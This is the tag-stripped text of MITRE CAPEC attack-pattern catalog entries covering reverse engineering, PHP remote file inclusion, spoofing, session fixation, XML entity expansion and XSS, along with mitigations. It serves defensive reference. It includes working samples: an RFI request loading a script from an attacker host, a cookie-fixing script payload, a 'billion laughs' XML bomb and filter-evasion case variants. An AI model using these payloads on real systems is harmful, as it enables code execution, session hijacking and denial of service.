Malicious input delivered through standard script page, e.g. ASP web page
Varies with instantiation of attack pattern. May contain network probe or attacks that run against or on host using host account permissions
Web server scripting host
Enables attacker to execute scripts on remote host
79
Targeted
276
Targeted
279
Secondary
284
Secondary
692
Targeted
697
Targeted
713
Targeted
71
Targeted
1000
Attack Pattern
PeerOf
18
1000
Attack Pattern
ChildOf
242
333
Category
HasMember
341
Penetration
Medium
High
Low
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker analyzes a binary file or executable for the purpose of discovering the structure, function, and possibly source-code of the file by using a variety of analysis techniques to effectively determine how the software functions and operates. This type of analysis is also referred to as Reverse Code Engineering, as techniques exist for extracting source code from an executable.
Several techniques are often employed for this purpose, both black box and white box. The use of computer bus analyzers and packet sniffers allows the binary to be studied at a level of interactions with its computing environment, such as a host OS, inter-process communication, and/or network communication. This type of analysis falls into the 'black box' category because it involves behavioral analysis of the software without reference to source code, object code, or protocol specifications.
White box analysis techniques include file or binary analysis, debugging, disassembly, and decompilation, and generally fall into categories referred to as 'static' and 'dynamic' analysis. Static analysis encompasses methods which analyze the binary, or extract its source code or object code without executing the program. Dynamic analysis involves analyzing the program during execution.
Some forms of file analysis tools allow the executable itself to be analyzed, the most basic of which can analyze features of the binary, such as the strings contained within the file. More sophisticated forms of static analysis analyze the binary file and extract assembly code, and possibly source code representations, from analyzing the structure of the file itself. Dynamic analysis tools execute the binary file and monitor its in memory footprint, revealing its execution flow, memory usage, register values, and machine instructions. This type of analysis is most effective for analyzing the execution of binary files whose content has been obfuscated or encrypted in its native executable form.
Debuggers allow the program's execution to be monitored, and depending upon the debugger's sophistication may show relevant source code for each step in execution, or may display and allow interactions with memory, variables, or values generated by the program during run-time operations. Disassemblers operate in reverse of assemblers, allowing assembly code to be extracted from a program as it executes machine code instructions. Disassemblers allow low-level interactions with the program as it executes, such as manipulating the program's run time operations. Decompilers can be utilized to analyze a binary file and extract source code from the compiled executable. Collectively, the tools and methods described are those commonly applied to a binary executable file and provide means for reverse engineering the file by revealing the hidden functions of its operation or composition.
Low
Access to the target file such that it can be analyzed with the appropriate tools. A range of tools suitable for analyzing an executable or its operations
798
Targeted
259
Secondary
1000
Attack Pattern
ChildOf
189
Wikipedia
Decompiler
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Decompiler
Wikipedia
Debugger
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Debugger
Wikipedia
Disassembler
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Disassembler
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in activities to discover any sensitive strings are present within the compiled code of an executable, such as literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis.
One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password.
When analyzing an executable the attacker may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.
More sophisticated methods of searching for sensitive strings within a file involve disassembly or decompiling of the file. One could, for example, utilize disassembly methods on an ISAPI executable or dll to discover a hard-coded password within the code as it executes. This type of analysis usually involves four stages in which first a debugger is attached to the running process, anti-debugging countermeasures are circumvented or bypassed, the program is analyzed step-by-step, and breakpoints are established so that discrete functions and data structures can be analyzed.
Debugging tools such as SoftICE, Ollydbg, or vendor supplied debugging tools are often used. Disassembly tools such as IDA pro, or similar tools, can also be employed. A third strategy for accessing sensitive strings within a binary involves the decompilation of the file itself into source code that reveals the strings. An example of this type of analysis involves extracting source code from a java JAR file and then using functionality within a java IDE to search the source code for sensitive, hard-coded information. In performing this analysis native java tools, such as "jar" are used to extract the compiled class files. Next, a java decompiler such as "DJ" is used to extract java source code from the compiled classes, revealing source code. Finally, the source code is audited to reveal sensitive information, a step that is usually assisted by source code analysis programs.
Low
Access to a binary or executable such that it can be analyzed by various utilities. Binary analysis programs such as 'strings' or 'grep', or hex editors. Decompilers such as "DJ" for java, or decompilers designed for specific languages. Debugging programs such as ollydbg, SoftICE, or disassemblers such as IDA Pro.
798
Targeted
259
Secondary
1000
Attack Pattern
ChildOf
190
Wikipedia
Decompiler
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Decompiler
Wikipedia
Debugger
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Debugger
Wikipedia
Disassembler
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Disassembler
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in activities to decipher and/or decode protocol information for a network or application communication protocol used for transmitting information between interconnected nodes or systems on a packet-switched data network. While this type of analysis inherently involves the analysis of a networking protocol, it does not require the presence of an actual or physical network. Although certain techniques for protocol analysis benefit from manipulating live 'on-the-wire' interactions between communicating components, static or dynamic analysis techniques applied to executables as well as to device drivers such as network interface drivers, can also be used to reveal the function and characteristics of a communication protocol implementation.
Depending upon the methods used, protocol reverse engineering can involve similar methods as those employed when reverse engineering an executable, or the process may involve observing, interacting, and modifying actual communications occurring between hosts. The goal of protocol reverse engineering is to derive the data transmission syntax, as well as to extract the meaningful content, including packet or content delimiters used by the protocol. This type of analysis is often performed on closed-specification protocols, or proprietary protocols, but is also useful for analyzing publicly available specifications to determine how particular implementations deviate from published specifications.
There are several challenges inherent to protocol reverse engineering depending upon the nature of the protocol being analyzed. There may also be other types of factors which complicate the process such as encryption or ad hoc obfuscation of the protocol. In general there are two kinds of networking protocols, each associated with its own challenges and analysis approaches or methodologies. Some protocols are human-readable, which is to say they are text-based protocols. Examples of these types of protocols include HTTP, SMTP, and SOAP. Additionally, application-layer protocols can be embedded or encapsulated within human-readable protocols in the data portion of the packet. Typically, human-readable protocol implementations are susceptible to automatic decoding by the appropriate tools, such as Wireshark/ethereal, tcpdump, or similar protocol sniffers or analyzers.
The presence of well-known protocol specifications in addition to easily identified protocol delimiters, such as Carriage Return or Line Feed characters (CRLF) result in text-based protocols susceptibility to direct scrutiny through manual processes. Protocol reverse engineering against protocol implementation such as HTTP is often performed to identify idiosyncratic implementations of a protocol by a server or client. In the case of application-layer protocols which are embedded within text-based protocols, analysis techniques typically benefit from the well-known nature of the encapsulating protocols and can focus on discovering the semantic characteristics of the proprietary protocol or API, since the syntax and protocol delimiters of the underlying protocols can be readily identified.
When performing protocol analysis of machine-readable (non-text-based) protocols difficulties emerge as the protocol itself was designed to be read by computing process. Such protocols are typically composed entirely in binary with no apparent syntax, grammar, or structural boundaries. Examples of these types of protocols are IP, UDP, and TCP. Binary protocols with published specifications can be automatically decoded by protocol analyzers, but in the case of proprietary, closed-specification, binary protocols there are no immediate indicators of packet syntax such as packet boundaries, delimiters, or structure, or the presence or absence of encryption or obfuscation. In these cases there is no one technology that can extract or reveal the structure of the packet on the wire, so it is necessary to use trial and error approaches while observing application behavior based on systematic mutations introduced at the packet-level. Tools such as Protocol Debug (PDB) or other packet injection suites are often employed. In cases where the binary executable is available, protocol analysis can be augmented with static and dynamic analysis techniques.
Low
Access to a binary executable such that it can be analyzed using static and/or dynamic tools, or the ability to observe and interact with a communication channel between communicating processes. Debugging programs such as ollydbg, SoftICE, or disassemblers such as IDA Pro. Packet sniffing or packet analyzing programs such as TCP dump, Wireshark. Specific protocol analysis tools such as PDB (Protocol Debug). Packet injection tools such as pcap or Nemesis.
798
Targeted
259
Secondary
1000
Attack Pattern
ChildOf
188
1000
Attack Pattern
PeerOf
189
Wikipedia
Proprietary protocol
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Proprietary_protocol
Wikipedia
Reverse engineering
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Reverse_engineering
CAPEC Content Team
The MITRE Corporation
2014-06-23
In this pattern the attacker is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized "include" or "require" call, which the user can then control to point to any web-accessible file. This allows attackers to hijack the targeted application and force it to execute their own instructions.
Survey application
Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds.
Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.
env-Web
URL parameters are used by the application
env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web
No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding parameters is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Attempt variations on input parameters
The attack variants make use of a remotely available PHP script that generates a uniquely identifiable output when executed on the target application server. Possibly using an automated tool, an attacker requests variations on the inputs he surveyed before. He sends parameters that include variations of payloads which include a reference to the remote PHP script. He records all the responses from the server that include the output of the execution of remote PHP script.
Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of PHP remote file inclusion payloads which include a reference to the attackers' controlled remote PHP script.
env-Web
Use a proxy tool to record results of manual input of remote file inclusion probes in known URLs.
env-Web
The output of the remote PHP script is included in the response web page.
env-Web
Nothing is returned to the web page. The payload script might have been executed in a different context which wouldn't be included in the response web page
env-Web
The application returns an error associated with the inclusion of remote file.
env-All
The application server doesn't download the remote PHP script.
env-All
The attacker's script is being executed on the application server and an output is being delivered at some point in the web site (if not on the same web page)
The remote PHP script doesn't appear to have been executed by the application server. It is possible to create behaviors to monitor the execution such as, for example, the remote PHP script tries to make an HTTP request to an attacker controlled web server, and therefore if the remote PHP script is executed on the application server, the attacker would have evidence in the access log file of his web server.
No access to the remote PHP script has been recorded to the access log file of the web server hosting this script
Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard Remote File Inclusion (RFI) probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.
Apply appropriate input validation to filter all user-controllable input
When possible, configure the PHP runtime environment to prevent the execution of remote PHP scripts
Actively monitor the application and either deny or redirect requests from origins that appear to be generating RFI probes.
When possible, only use the "include", "require", etc. PHP directives with statically define strings
Run arbitrary server-side code
As the attacker succeeds in exploiting the vulnerability, he is able to execute server-side code within the application. The malicious code has virtual access to the same resources as the targeted application. Note that the attacker might include shell code in his script and execute commands on the server under the same privileges as the PHP runtime is running with.
Develop malicious PHP script that is injected through vectors identified during the Experiment Phase and executed by the application server to execute a custom PHP script.
env-All
The attacker's script is being executed on the application server
Monitor server logs for parameters containing URL with references to remote content
Apply appropriate input validation to filter all user-controllable input
When possible, configure the PHP runtime environment to prevent the execution of remote PHP scripts
When possible, only use the "include", "require", etc. PHP directives with statically define strings
Target application server must allow remote files to be included in the "require", "include", etc. PHP directives
High
High
Injection
The attacker controls a PHP script on a server "http://attacker.com/rfi.txt"
The .txt extension is given so that the script doesn't get executed by the attacker.com server, and it will be downloaded as text. The target application is vulnerable to PHP remote file inclusion as following: include($_GET['filename'] . '.txt')
The attacker creates an HTTP request that passes his own script in the include: http://example.com/file.php?filename=http://attacker.com/rfi with the concatenation of the ".txt" prefix, the PHP runtime download the attack's script and the content of the script gets executed in the same context as the rest of the original script.
Low
To inject the malicious payload in a web page
Medium
To bypass filters in the application
Ability to send HTTP request to a web application Ability to store PHP scripts on a server
Implementation: Perform input validation for all remote content, including remote and user-generated content
Implementation: Only allow known files to be included (whitelist)
Implementation: Make use of indirect references passed in URL parameters instead of file names
Configuration: Ensure that remote scripts cannot be include in the "include" or "require" PHP directives
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
Any HTTP Request transport variables (GET, POST, etc.)
Application server running PHP where the script is executed
Application server may be used to steal information such as code, create custom queries to the databases, etc. Since the attackers' script runs within the same context as the application it is injected in, it has virtually the same capabilities.
98
Targeted
80
Targeted
714
Targeted
1000
Attack Pattern
ChildOf
253
Exploitation
Penetration
High
High
High
Client-Server
SOA
All
All
PHP
WASC Threat Classification 2.0
WASC-05 - Remote File Inclusion
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Remote-File-Inclusion
Shaun Clowes
A Study In Scarlet, Exploiting Common Vulnerabilities in PHP Applications
Blackhat Briefings Asia 2001
http://www.securereality.com.au/studyinscarlet.txt
OWASP Top 10
Top 10 2007 - Malicious File Execution
2007
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Top_10_2007-A3
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary provides data under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or it might be an attempt by the adversary to assume the rights granted to another identity. One of the simplest forms of this attack would be the creation of an email message with a modified "From" field in order to appear that the message was sent from someone other than the actual sender. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation.
The target application must associate data with its source. This association could be as simple as logging the source of the data (in which case this attack seeks to create a false trail in the log) or the target application could associate some increased level of access with certain identities (in which case an attacker might seek to impersonate those identities in order to increase privileges).
Medium
Resources required vary depending on the nature of the attack. Possible tools needed by an attacker could include tools to create custom network packets, specific client software, and tools to capture network traffic. Many variants of this attack require no attacker resources, however.
601
Targeted
1000
Attack Pattern
ChildOf
151
CAPEC Content Team
The MITRE Corporation
2014-06-23
A Principle Spoof is a form of Identity Spoofing where an adversary pretends to be some other person in an interaction. This is often accomplished by crafting a message (either written, verbal, or visual) that appears to come from a person other than the adversary. Phishing and Pharming attacks often attempt to do this so that their attempts to gather sensitive information appear to come from a legitimate source. A Principle Spoof does not use stolen or spoofed authentication credentials, instead relying on the appearance and content of the message to reflect identity. The possible outcomes of a Principal Spoof mirror those of Identity Spoofing. (e.g., escalation of privilege and false attribution of data or activities) Likewise, most techniques for Identity Spoofing (crafting messages or intercepting and replaying or modifying messages) can be used for a Principal Spoof attack. However, because a Principal Spoof is used to impersonate a person, social engineering can be both an attack technique (using social techniques to generate evidence in support of a false identity) as well as a possible outcome (manipulating people's perceptions by making statements or performing actions under a target's name).
The target must associate data or activities with an person's identity and the adversary must be able to modify this identity without detection.
Medium
No special resources are required for most variants of this attack.
1000
Attack Pattern
ChildOf
151
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker creates a false but functional session credential in order to gain or usurp access to a service. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. If an attacker is able to forge valid session credentials they may be able to bypass authentication or piggy-back off some other authenticated user's session. This attack differs from Reuse of Session IDs and Session Sidejacking attacks in that in the latter attacks an attacker uses a previous or existing credential without modification while, in a forging attack, the attacker must create their own credential, although it may be based on previously observed credentials.
Analyze and Understand Session IDs
The attacker finds that the targeted application use session credentials to identify legitimate users.
An attacker makes many anonymous connections and records the session IDs.
env-Web
An attacker makes authorized connections and records the session tokens or credentials.
env-Web
Valid session information
env-Web
No valid session information
env-Web
The attacker models the session ID algorithm enough to produce a compatible series or IDs, or just one match. (When IDs are predictable)
Monitor logs for unusual multiple connections from a source.
Create Session IDs.
Attackers craft messages containing their forged credentials in GET, POST request, HTTP headers or cookies.
The attacker manipulates the HTTP request message and adds his forged session IDs in to the requests or cookies.
env-Web
Find that application uses session credentials.
env-Web
Find that application does not use session credentials.
env-Web
Victim application accepts attackers' session credentials.
Victim application does not accept attackers' session credentials.
Detect and alert on users who provide known session IDs in their connection establishment. Since this also fits the scenario where a user's session has expired, the heuristic must be a bit smarter, perhaps looking for an unusually high number of such occurrences in a short time frame.
Abuse the Victim's Session Credentials
The attacker fixates falsified session ID to the victim when victim access the system. Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the forged session identifier.
The attacker loads the predefined or predicted session ID into his browser and browses to protected data or functionality.
env-All
The attacker loads the predefined or predicted session ID into his software and utilizes functionality with the rights of the victim.
env-All
The attacker gains access to data or functionality with the rights of the victim.
Detect and alert on multiple simultaneous uses of the same session ID from different origins.
Apply appropriate input validation to filter all user-controllable input
The targeted application must use session credentials to identify legitimate users. Session identifiers that remains unchanged when the privilege levels change. Predictable session identifiers.
Medium
Medium
Injection
Time and State
This example uses client side scripting to set session ID in the victim's browser. The JavaScript code
document.cookie="sessionid=0123456789"
fixates a falsified session credential into victim's browser, with the help of crafted a URL link.
http://www.example.com/<script>document.cookie="sessionid=0123456789";</script>
A similar example uses session ID as an argument of the URL.
http://www.example.com/index.php/sessionid=0123456789
Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim's session.
Medium
Forge the session credential and reply the request.
Attackers may require tools to craft messages containing their forged credentials, and ability to send HTTP request to a web application.
Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.
Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
GET or POST data, HTTP header, session cookies
Any HTTP Request transport variables (GET, POST, Headers, etc.)
Target application's session management mechanism
The payload activation impact is that a session identifier of the attackers' choice is considered valid and trust decisions by the application will be based on such a forged identifier.
384
Targeted
361
Secondary
664
Targeted
1000
Attack Pattern
CanPrecede
384
In a Session Fixation attack, the attacker provides a credential and coerces a user into using that credential when authenticating with the server. If the format of credentials is anything but trivial, the attacker would need to forge a valid-looking credential first.
1000
Attack Pattern
ChildOf
21
http://capec.mitre.org/data/definitions/21.html
Penetration
High
High
Low
Web
Client-Server
SOA
All
All
All
Thomas Schreiber
Session Riding: A Widespread Vulnerability in Today's Web Applications
SecureNet GmbH
Dec 2004
http://www.securenet.de/papers/Session_Riding.pdf
Common Weakness Enumeration (CWE)
CWE-384: Session Fixation
Draft
The MITRE Corporation
http://cwe.mitre.org/data/definitions/384.html
OWASP Testing Guide
Testing for Session Management
v4 [DRAFT]
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Testing_for_Session_Management
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker submits an XML document to a target application where the XML document uses nested entity expansion to produce an excessively large output XML. XML allows the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.
Survey the target
Using a browser or an automated tool, an attacker records all instances of web services to process XML requests.
Use an automated tool to record all instances of URLs to process XML requests.
env-Web env-ClientServer
Use a browser to manually explore the website and analyze how the application processes XML requests.
env-Web env-ClientServer
The URL processes XML content.
env-Web env-ClientServer
The application does not seem to accept XML content.
env-Web env-ClientServer
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Launch an XML Entity Expansion attack
The attacker crafts malicious XML message to force recursive entity expansion (or other repeated processing) that completely uses up available server resource.
Send the malicious crafted XML message containing recursive entity uses to the target URL.
env-Web env-ClientServer
The attacker causes the target application denial of service.
Disable altogether the use of inline DTD schemas in your XML parsing objects.
This type of attack requires that the target must receive XML input but either fail to provide an upper limit for entity expansion or provide a limit that is so large that it does not preclude significant resource consumption.
Medium
High
Flooding
The most common example of this type of attack is the "many laughs" attack (sometimes called the 'billion laughs' attack). For example:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
This is well formed and valid XML according to the DTD. Each entity increases the number entities by a factor of 10. The line of XML containing lol9; expands out exponentially to a message with 10^9 entities. A small message of a few KBs in size can easily be expanded into a few GB of memory in the parser. By including 3 more entities similar to the lol9 entity in the above code to the DTD, the program could expand out over a TB as there will now be 10^12 entities. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow.
Low
To send recursive entity expansion XML messages.
No special resource required.
Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.
Implementation: Disable altogether the use of inline DTD schemas in your XML parsing objects. If must use DTD, normalize, filter and white list and parse with methods and routines that will detect entity expansion from untrusted sources.
Availability
DoS: amplification
DoS: resource consumption (CPU)
DoS: resource consumption (memory)
DoS: resource consumption (other)
Denial of Service
XML-capable system interfaces
Maliciously crafted entity expansion XML message
XML inspection, parsing and validation routines
Denial of Service
400
Targeted
770
Targeted
1000
Attack Pattern
ChildOf
230
1000
Attack Pattern
CanFollow
228
Exploitation
Low
Low
High
SOA
All
All
Amit Klein
Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD
http://www.securityfocus.com/archive/1/303509
Andre Yee
Threat Protection in a Service Oriented World
NFR Security
http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf
Pete Lindstrom
Attacking & Defending Web Services
SPiRE Security
2002
http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf
Elliotte Rusty Harold
Tip: Configure SAX parsers for secure processing
IBM developerWorks
IBM
May 27, 2005
http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html
Bryan Sullivan
XML Denial of Service Attacks and Defenses
http://msdn.microsoft.com/en-us/magazine/ee335713.aspx
Bryan Sullivan
XML Denial of Service Attacks and Defenses
November 2009 Issue
MSDN Magazine
Microsoft
2009
http://msdn.microsoft.com/en-us/magazine/ee335713.aspx
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page. When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the attacker the infected error message error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.
A third party web server which fails to adequately sanitize messages sent in error pages.
The victim must be made to execute a query crafted by the attacker which results in the infected error report.
Medium
None
Design: Use libraries and templates that minimize unfiltered input.
Implementation: Normalize, filter and white list any input that will be used in error messages.
Implementation: The victim should configure the browser to minimize active content from untrusted sources.
79
Targeted
81
Targeted
1000
Attack Pattern
ChildOf
18
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the "script" tag using the alternate forms of "Script" or "ScRiPt" may bypass filters where "script" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.
Survey the application
Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds.
Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.
env-Web
URL parameters are used by the application or the browser (DOM)
env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web
No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding parameters is created by the attacker.
A list of application user interface entry fields is created by the attacker.
A list of resources accessed by the application is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Attempt injection payload variations on input parameters
Possibly using an automated tool, an attacker requests variations on the inputs he surveyed before. He sends parameters that include variations of payloads. The payloads are designed to bypass incomplete filtering (e.g., incomplete HTML encoding etc.) and tries many variations of characters injection that would enable the XSS payload. He records all the responses from the server that include unmodified versions of his script.
Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier. Attempt numerous variations based on form, format, syntax & encoding.
env-Web
Use a proxy tool to record results of manual input of XSS probes in known URLs.
env-Web
The output of pages includes some form of a URL parameter. E.g., ?error="File not Found" becomes "File not Found" in the title of the web page
env-Web
User-controllable input is output back to the browser
env-Web
Nothing is returned to the web page. The payload may be a stored to be served later. The unique identifier from the probe helps to trace the flow of the possible XSS.
env-Web
The attacker's script string is being reflected verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, etc.)
All context-sensitive characters are consistently re-encoded before being sent to the web browser. For example, in a HTML tag element, the payload may not be able to evade the quotes in order to inject another attribute.
Some sensitive characters are consistently encoded, but others are not
Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Do not embed user-controllable input generated HTTP headers
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Steal session IDs, credentials, page content, etc.
As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.
env-Web
The attacker gets the user's cookies or other session identifiers.
The attacker gets the content of the page the user is viewing.
The attacker causes the user's browser to visit a page with malicious content.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Forceful browsing
When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).
env-Web
The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF.
The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Content spoofing
By manipulating the content, the attacker targets the information that the user would like to get from the website.
